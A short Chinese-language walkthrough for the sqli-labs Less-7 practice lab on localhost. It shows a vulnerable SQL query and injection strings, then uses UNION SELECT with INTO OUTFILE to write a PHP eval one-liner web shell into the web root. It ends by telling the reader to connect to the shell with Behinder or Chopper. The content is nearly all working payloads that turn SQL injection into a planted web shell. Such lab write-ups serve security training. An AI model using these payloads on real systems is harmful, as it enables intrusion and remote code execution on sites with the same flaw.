Less7
本关利用文件导入的方式进行注入
查看源码,重点关注对id参数的处理和sql语句上,源代码如下:
1 | $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; |
这里对id参数进行了’))处理,所以可以尝试')) or 1=1--+进行注入
我们这里利用上述提到的文件导入的方式进行演示:
1 | http://127.0.0.1/sqli-labs/Less-7/?id=1'))UNION SELECT 1,2,3 into outfile "D:\\phpStudy\\WWW\\sqli-labs\\Less-7\\1.txt"--+ |
上图中显示sql语句出错了,但是文件中可以看到1.txt已经生成了。
直接写入php一句话
1 | http://127.0.0.1/sqli-labs/Less-7/?id=1'))UNION SELECT 1,2,'<?php @eval($_post["mima"])?>' into outfile "D:\\phpStudy\\WWW\\sqli-labs\\Less-7\\yijuhua.php"--+ |
文件中可以看到已经上传成功了
然后使用冰蝎、菜刀等工具连接即可